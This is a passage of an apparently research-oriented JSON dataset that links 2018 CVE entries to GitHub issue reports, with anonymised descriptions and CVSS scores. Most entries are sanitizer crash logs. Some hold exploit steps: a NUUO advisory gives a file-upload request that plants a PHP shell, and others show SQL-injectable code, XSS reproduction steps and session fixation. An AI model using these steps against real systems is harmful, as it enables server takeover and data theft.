  19790. "Issue_Url_old": "https://github.com/IceEnd/Yosoro/issues/11",
  19791. "Issue_Url_new": "https://github.com/iceend/yosoro/issues/11",
  19792. "Repo_new": "iceend/yosoro",
  19793. "Issue_Created_At": "2018-05-17T11:37:23Z",
  19794. "description": "FILETAG Expected behavior This cross site scripting vulnerability allows an attacker to execute arbitrary code on the victims machine by creating a malicious note. In the worst case this will lead to a reverse shell. I am not going to paste the code for the reverse shell here for obvious reasons.",
  19795. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19796. "severity": "MEDIUM",
  19797. "baseScore": 6.1,
  19798. "impactScore": 2.7,
  19799. "exploitabilityScore": 2.8
  19800. },
  19801. {
  19802. "CVE_ID": "CVE-2018-11523",
  19803. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/1",
  19804. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/1",
  19805. "Repo_new": "unh3x/just4cve",
  19806. "Issue_Created_At": "2018-05-28T12:37:21Z",
  19807. "description": "NUUO APITAG / APITAG Arbitrary File Upload Vulnerability. NUUO APITAG / APITAG Arbitrary File Upload Vulnerability ========================== Advisory: NUUO APITAG / APITAG Arbitrary File Upload Vulnerability Author: M3 MENTIONTAG From APITAG Affected Version: All ========================== Vulnerability Description ========================== Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO APITAG program, APITAG is widely used all over the world. Vulnerable cgi: FILETAG APITAG As the code above, no any filter, so we can upload a php shell directly to the web server. ========================== POC && EXP NUMBERTAG Upload APITAG to web root path: POST FILETAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Accept: / Accept Language: en User Agent: Mozilla NUMBERTAG compatible; MSIE NUMBERTAG Windows NT NUMBERTAG Win NUMBERTAG Trident NUMBERTAG Connection: close Content Type: multipart/form data; boundary NUMBERTAG Content Length NUMBERTAG Content Disposition: form data; name=\"userfile\"; APITAG APITAG NUMBERTAG Check if the php file is uploaded successfully: GET FILETAG If the page returns phpinfo info, target is vulnerable! Just enjoy it!",
  19808. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19809. "severity": "CRITICAL",
  19810. "baseScore": 9.8,
  19811. "impactScore": 5.9,
  19812. "exploitabilityScore": 3.9
  19813. },
  19814. {
  19815. "CVE_ID": "CVE-2018-11528",
  19816. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/138",
  19817. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/138",
  19818. "Repo_new": "wuzhicms/wuzhicms",
  19819. "Issue_Created_At": "2018-05-28T05:41:32Z",
  19820. "description": "\u4e94\u6307CMS NUMBERTAG SQL\u6ce8\u5165. \u6f0f\u6d1ePOC\uff1a APITAG APITAG PATHTAG APITAG NUMBERTAG require PATHTAG require APITAG if(!isset($GLOBALS['param'])) { APITAG } elseif($GLOBALS['param']=='') { APITAG } $code = APITAG $posttime = SYS_TIME NUMBERTAG db = load_class('db'); $r = $db >get_one('sms_checkcode',\" code ='$code' AND posttime >$posttime NUMBERTAG id DESC'); if($r) { APITAG } else { APITAG } APITAG \u5b98\u7f51\u5df2\u7ecf\u590d\u73b0\u6210\u529f.",
  19821. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19822. "severity": "CRITICAL",
  19823. "baseScore": 9.8,
  19824. "impactScore": 5.9,
  19825. "exploitabilityScore": 3.9
  19826. },
  19827. {
  19828. "CVE_ID": "CVE-2018-11536",
  19829. "Issue_Url_old": "https://github.com/mity/md4c/issues/36",
  19830. "Issue_Url_new": "https://github.com/mity/md4c/issues/36",
  19831. "Repo_new": "mity/md4c",
  19832. "Issue_Created_At": "2018-05-28T16:35:09Z",
  19833. "description": "Multiple vulnerabilities in md4c. Multiple vulnerabilities in md4c There are multiple vulnerabilities in md4c (git repository: URLTAG Latest commit NUMBERTAG e2a5c on Apr NUMBERTAG git log commit APITAG Author: Martin Mitas < EMAILTAG rg> Date: Thu Apr NUMBERTAG Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG It seems like that an overflow happened in APITAG in APITAG memcpy(dummy, mark, sizeof(MD_MARK)); APITAG provided information as below NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG a NUMBERTAG at pc NUMBERTAG dd7f5 bp NUMBERTAG ffedcfedc NUMBERTAG sp NUMBERTAG ffedcfed3e0 WRITE of size NUMBERTAG at NUMBERTAG a NUMBERTAG thread T NUMBERTAG dd7f4 in __asan_memcpy PATHTAG NUMBERTAG dd3 in md_split_simple_pairing_mark PATHTAG NUMBERTAG dd3 in APITAG PATHTAG NUMBERTAG in md_analyze_marks PATHTAG NUMBERTAG c9c8 in md_analyze_link_contents PATHTAG NUMBERTAG c9c8 in md_analyze_inlines PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG e7f7 in md_process_leaf_block PATHTAG NUMBERTAG e7f7 in md_process_all_blocks PATHTAG NUMBERTAG e7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG f NUMBERTAG c6fc NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG a NUMBERTAG is a wild pointer. SUMMARY: APITAG heap buffer overflow PATHTAG in __asan_memcpy Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG c NUMBERTAG fff NUMBERTAG a NUMBERTAG c NUMBERTAG fff NUMBERTAG b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG It seems like that mark variable access a restricted area of memory in APITAG while(!(mark >flags & MD_MARK_RESOLVED) || mark >beg APITAG NUMBERTAG c3c7fff NUMBERTAG fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c3c7fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  19834. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19835. "severity": "CRITICAL",
  19836. "baseScore": 9.8,
  19837. "impactScore": 5.9,
  19838. "exploitabilityScore": 3.9
  19839. },
  19840. {
  19841. "CVE_ID": "CVE-2018-11545",
  19842. "Issue_Url_old": "https://github.com/mity/md4c/issues/39",
  19843. "Issue_Url_new": "https://github.com/mity/md4c/issues/39",
  19844. "Repo_new": "mity/md4c",
  19845. "Issue_Created_At": "2018-05-29T15:41:50Z",
  19846. "description": "Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG APITAG provided information as below: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b1 at pc NUMBERTAG ff NUMBERTAG bp NUMBERTAG fff NUMBERTAG be8d0 sp NUMBERTAG fff NUMBERTAG be8c8 WRITE of size NUMBERTAG at NUMBERTAG b1 thread T NUMBERTAG ff NUMBERTAG in md_merge_lines PATHTAG NUMBERTAG ff NUMBERTAG in md_merge_lines_alloc PATHTAG NUMBERTAG ff NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in md_end_current_block PATHTAG NUMBERTAG c7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG fda NUMBERTAG a NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG NUMBERTAG b1 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG e NUMBERTAG f in md_merge_lines_alloc PATHTAG NUMBERTAG e NUMBERTAG f in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG in md_end_current_block PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in md_merge_lines Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fd fd fd fd fd fd fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  19847. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19848. "severity": "CRITICAL",
  19849. "baseScore": 9.8,
  19850. "impactScore": 5.9,
  19851. "exploitabilityScore": 3.9
  19852. },
  19853. {
  19854. "CVE_ID": "CVE-2018-11546",
  19855. "Issue_Url_old": "https://github.com/mity/md4c/issues/38",
  19856. "Issue_Url_new": "https://github.com/mity/md4c/issues/38",
  19857. "Repo_new": "mity/md4c",
  19858. "Issue_Created_At": "2018-05-29T15:41:25Z",
  19859. "description": "Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG APITAG provided information as below NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f at pc NUMBERTAG c6 bp NUMBERTAG ffe NUMBERTAG e1b NUMBERTAG sp NUMBERTAG ffe NUMBERTAG e1b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f thread T NUMBERTAG c5 in md_is_named_entity_contents PATHTAG NUMBERTAG c5 in md_is_entity_str PATHTAG NUMBERTAG b NUMBERTAG in md_build_attribute PATHTAG NUMBERTAG f9 in md_enter_leave_span_a PATHTAG NUMBERTAG d2 in md_process_inlines PATHTAG NUMBERTAG d2 in APITAG PATHTAG NUMBERTAG e7f7 in md_process_leaf_block PATHTAG NUMBERTAG e7f7 in md_process_all_blocks PATHTAG NUMBERTAG e7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG fd6be7ec NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG NUMBERTAG f is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG de NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG bedb in md_merge_lines_alloc PATHTAG NUMBERTAG bedb in md_is_inline_link_spec_helper PATHTAG NUMBERTAG b9bf in md_is_inline_link_spec PATHTAG NUMBERTAG b9bf in md_resolve_links PATHTAG NUMBERTAG b9bf in md_analyze_inlines PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in md_is_named_entity_contents Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff7fb NUMBERTAG c NUMBERTAG fff7fc NUMBERTAG c NUMBERTAG fff7fd NUMBERTAG c NUMBERTAG fff7fe NUMBERTAG c NUMBERTAG fff7ff NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  19860. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19861. "severity": "CRITICAL",
  19862. "baseScore": 9.8,
  19863. "impactScore": 5.9,
  19864. "exploitabilityScore": 3.9
  19865. },
  19866. {
  19867. "CVE_ID": "CVE-2018-11547",
  19868. "Issue_Url_old": "https://github.com/mity/md4c/issues/37",
  19869. "Issue_Url_new": "https://github.com/mity/md4c/issues/37",
  19870. "Repo_new": "mity/md4c",
  19871. "Issue_Created_At": "2018-05-29T15:40:53Z",
  19872. "description": "Heap buffer overflow in APITAG command: ./md2html testfile testcase: URLTAG APITAG provided information as below: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG e1e4 bp NUMBERTAG ffdf NUMBERTAG ab NUMBERTAG sp NUMBERTAG ffdf NUMBERTAG ab NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG e1e3 in APITAG PATHTAG NUMBERTAG d5 in APITAG PATHTAG NUMBERTAG d5 in APITAG PATHTAG NUMBERTAG d5 in md_end_current_block PATHTAG NUMBERTAG c7f7 in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a NUMBERTAG in _start ( PATHTAG NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ded NUMBERTAG in realloc PATHTAG NUMBERTAG b NUMBERTAG in md_push_block_bytes PATHTAG NUMBERTAG b NUMBERTAG in md_start_new_block PATHTAG NUMBERTAG b NUMBERTAG in md_process_line PATHTAG NUMBERTAG b NUMBERTAG in md_process_doc PATHTAG NUMBERTAG cb in md_parse PATHTAG NUMBERTAG a7a8 in md_render_html PATHTAG NUMBERTAG cc in process_file PATHTAG NUMBERTAG cc in main PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG f in __libc_start_main PATHTAG SUMMARY: APITAG heap buffer overflow PATHTAG in APITAG Shadow bytes around the buggy address NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG c2a7fff NUMBERTAG fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c2a7fff NUMBERTAG a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  19873. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19874. "severity": "CRITICAL",
  19875. "baseScore": 9.8,
  19876. "impactScore": 5.9,
  19877. "exploitabilityScore": 3.9
  19878. },
  19879. {
  19880. "CVE_ID": "CVE-2018-11548",
  19881. "Issue_Url_old": "https://github.com/EOSIO/eos/issues/3497",
  19882. "Issue_Url_new": "https://github.com/eosio/eos/issues/3497",
  19883. "Repo_new": "eosio/eos",
  19884. "Issue_Created_At": "2018-05-28T17:04:20Z",
  19885. "description": "Limit P2P Connections from Same IP. To prevent DOS attacks against public endpoints we need to limit the number of connections from the same IP.",
  19886. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  19887. "severity": "HIGH",
  19888. "baseScore": 7.5,
  19889. "impactScore": 3.6,
  19890. "exploitabilityScore": 3.9
  19891. },
  19892. {
  19893. "CVE_ID": "CVE-2018-11549",
  19894. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/139",
  19895. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/139",
  19896. "Repo_new": "wuzhicms/wuzhicms",
  19897. "Issue_Created_At": "2018-05-29T03:54:23Z",
  19898. "description": "There is a a Stored XSS Vulnerabilities in Account Settings > Member Centre APITAG information > Ordinary member. Version: wuzhicms NUMBERTAG Steps to Reproduce NUMBERTAG register a account and Login the backstage URLTAG NUMBERTAG Go to Account Settings > Member Centre APITAG information > Ordinary member Fill in the QQ number FILETAG NUMBERTAG add the following payload to QQ Forms and click \u201csubmit\u201d APITAG APITAG FILETAG POST request data\uff1a _ CODETAG _ FILETAG APITAG Account Settings in Account Management to view FILETAG Stored XSS triggered ...",
  19899. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  19900. "severity": "MEDIUM",
  19901. "baseScore": 5.4,
  19902. "impactScore": 2.7,
  19903. "exploitabilityScore": 2.3
  19904. },
  19905. {
  19906. "CVE_ID": "CVE-2018-11555",
  19907. "Issue_Url_old": "https://github.com/mm2/Little-CMS/issues/167",
  19908. "Issue_Url_new": "https://github.com/mm2/little-cms/issues/167",
  19909. "Repo_new": "mm2/little-cms",
  19910. "Issue_Created_At": "2018-05-28T12:34:05Z",
  19911. "description": "Some bugs in CMS. There are some bugs in the latest commit of CMS. Some of the bugs could be exploited to execute code. one of the debug info as follows: ===== Program received signal SIGSEGV, Segmentation fault. [ stack NUMBERTAG fffffffe NUMBERTAG ffff7b NUMBERTAG c2c APITAG mov r NUMBERTAG QWORD PTR [rb NUMBERTAG fffffffe NUMBERTAG c NUMBERTAG fffffffe NUMBERTAG b NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG e NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG fffffffe NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff NUMBERTAG in NUMBERTAG ffff NUMBERTAG in NUMBERTAG ffff7b NUMBERTAG c2c in APITAG (p NUMBERTAG in NUMBERTAG e NUMBERTAG out NUMBERTAG APITAG APITAG Stride NUMBERTAG fffffffe NUMBERTAG at PATHTAG NUMBERTAG ffff7b NUMBERTAG in APITAG APITAG APITAG APITAG APITAG at ../. PATHTAG NUMBERTAG ac7 in APITAG APITAG out NUMBERTAG d0, in=<optimized out>, APITAG at PATHTAG NUMBERTAG APITAG APITAG out>, out=<optimized out>, in=<optimized out>) at PATHTAG NUMBERTAG main (argc=argc APITAG APITAG at PATHTAG NUMBERTAG ffff NUMBERTAG fe NUMBERTAG in __libc_start_main (main NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffeba8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffeb NUMBERTAG at PATHTAG NUMBERTAG e NUMBERTAG in _start () __main NUMBERTAG APITAG GDB NUMBERTAG may not support required Python API Description: Segmentation fault on program counter Short description: APITAG NUMBERTAG Hash: APITAG Exploitability Classification: EXPLOITABLE Explanation: The target tried to access data at an address that matches the program counter. This is likely due to the execution of a branch instruction (ex: 'call') with a bad argument, but it could also be due to execution continuing past the end of a memory region or another cause. Regardless this likely indicates that the program counter contents are tainted and can be contro lled by an attacker. Other tags: APITAG NUMBERTAG the commit have been tested is APITAG please see the following url for the bugs info and POCs: URLTAG",
  19912. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19913. "severity": "HIGH",
  19914. "baseScore": 7.8,
  19915. "impactScore": 5.9,
  19916. "exploitabilityScore": 1.8
  19917. },
  19918. {
  19919. "CVE_ID": "CVE-2018-11571",
  19920. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/486",
  19921. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/486",
  19922. "Repo_new": "clippercms/clippercms",
  19923. "Issue_Created_At": "2018-05-30T10:58:15Z",
  19924. "description": "Session Fixation. Clipper CMS NUMBERTAG is vulnerable to session fixation attack. APITAG Session Fixation attack fixes an established session on the victim's browser, so the attack starts before the user logs in. APITAG Fixation is an attack that permits an attacker to hijack a valid user session. The attack explores a limitation in the way the web application manages the session ID, more specifically the vulnerable web application. APITAG authenticating a user, it doesn\u2019t assign a new session ID, making it possible to use an existent session ID. APITAG attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user validated session by the knowledge of the used session ID. The attacker has to provide a legitimate Web application session ID and try to make the victim's browser use it. Let's see the session values before login FILETAG FILETAG Session Values after Login FILETAG FILETAG Mitigation: APITAG ID must be renewed after authentication (i.e) session must be different before authentication and after authentication. APITAG application should not accept user supplied cookie value (i.e)session value.",
  19925. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19926. "severity": "HIGH",
  19927. "baseScore": 8.8,
  19928. "impactScore": 5.9,
  19929. "exploitabilityScore": 2.8
  19930. },
  19931. {
  19932. "CVE_ID": "CVE-2018-11572",
  19933. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/485",
  19934. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/485",
  19935. "Repo_new": "clippercms/clippercms",
  19936. "Issue_Created_At": "2018-05-30T10:45:35Z",
  19937. "description": "Stored XSS in Module name field. Stored XSS is found in the APITAG name\" field in CMS Clipper NUMBERTAG APITAG module name value is obtained from the user,it is getting saved and displayed without any sanitation. Affected URL: URLTAG Steps to reproduce: APITAG Modules choose Manage modules >edit APITAG the XSS payload in APITAG name field and save it. APITAG script is getting executed and results in stored cross site scripting attack. For your reference: FILETAG FILETAG FILETAG FILETAG Mitigation: Strong Input validation has to be performed for all the entry APITAG encode all dynamic data before embedding it in the web page. Encoding should be context sensitive. URLTAG",
  19938. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  19939. "severity": "MEDIUM",
  19940. "baseScore": 5.4,
  19941. "impactScore": 2.7,
  19942. "exploitabilityScore": 2.3
  19943. },
  19944. {
  19945. "CVE_ID": "CVE-2018-11575",
  19946. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/4",
  19947. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/4",
  19948. "Repo_new": "miniupnp/ngiflib",
  19949. "Issue_Created_At": "2018-05-30T09:47:48Z",
  19950. "description": "stack buffer overflow ngiflib c NUMBERTAG asan report ERRORTAG poc: FILETAG",
  19951. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19952. "severity": "CRITICAL",
  19953. "baseScore": 9.8,
  19954. "impactScore": 5.9,
  19955. "exploitabilityScore": 3.9
  19956. },
  19957. {
  19958. "CVE_ID": "CVE-2018-11576",
  19959. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/6",
  19960. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/6",
  19961. "Repo_new": "miniupnp/ngiflib",
  19962. "Issue_Created_At": "2018-05-30T09:50:09Z",
  19963. "description": "heap buffer overflow ngiflib c NUMBERTAG asan report ERRORTAG poc: FILETAG",
  19964. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19965. "severity": "CRITICAL",
  19966. "baseScore": 9.8,
  19967. "impactScore": 5.9,
  19968. "exploitabilityScore": 3.9
  19969. },
  19970. {
  19971. "CVE_ID": "CVE-2018-11577",
  19972. "Issue_Url_old": "https://github.com/liblouis/liblouis/issues/582",
  19973. "Issue_Url_new": "https://github.com/liblouis/liblouis/issues/582",
  19974. "Repo_new": "liblouis/liblouis",
  19975. "Issue_Created_At": "2018-05-30T09:52:20Z",
  19976. "description": "SEGV logging c NUMBERTAG asan report ERRORTAG poc: FILETAG",
  19977. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19978. "severity": "HIGH",
  19979. "baseScore": 8.8,
  19980. "impactScore": 5.9,
  19981. "exploitabilityScore": 2.8
  19982. },
  19983. {
  19984. "CVE_ID": "CVE-2018-11578",
  19985. "Issue_Url_old": "https://github.com/miniupnp/ngiflib/issues/5",
  19986. "Issue_Url_new": "https://github.com/miniupnp/ngiflib/issues/5",
  19987. "Repo_new": "miniupnp/ngiflib",
  19988. "Issue_Created_At": "2018-05-30T09:48:58Z",
  19989. "description": "SEGV ngiflib c NUMBERTAG asan report ERRORTAG poc: FILETAG",
  19990. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19991. "severity": "MEDIUM",
  19992. "baseScore": 6.5,
  19993. "impactScore": 3.6,
  19994. "exploitabilityScore": 2.8
  19995. },
  19996. {
  19997. "CVE_ID": "CVE-2018-11590",
  19998. "Issue_Url_old": "https://github.com/espruino/Espruino/issues/1427",
  19999. "Issue_Url_new": "https://github.com/espruino/espruino/issues/1427",
  20000. "Repo_new": "espruino/espruino",
  20001. "Issue_Created_At": "2018-05-19T07:41:46Z",
  20002. "description": "stack over error. We found with our fuzzer a stackoverflow when the input file contains many parentheses. ERRORTAG sample input file: FILETAG",
  20003. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  20004. "severity": "MEDIUM",
  20005. "baseScore": 5.5,
  20006. "impactScore": 3.6,
  20007. "exploitabilityScore": 1.8
  20008. },
  20009. {
  20010. "CVE_ID": "CVE-2018-11591",
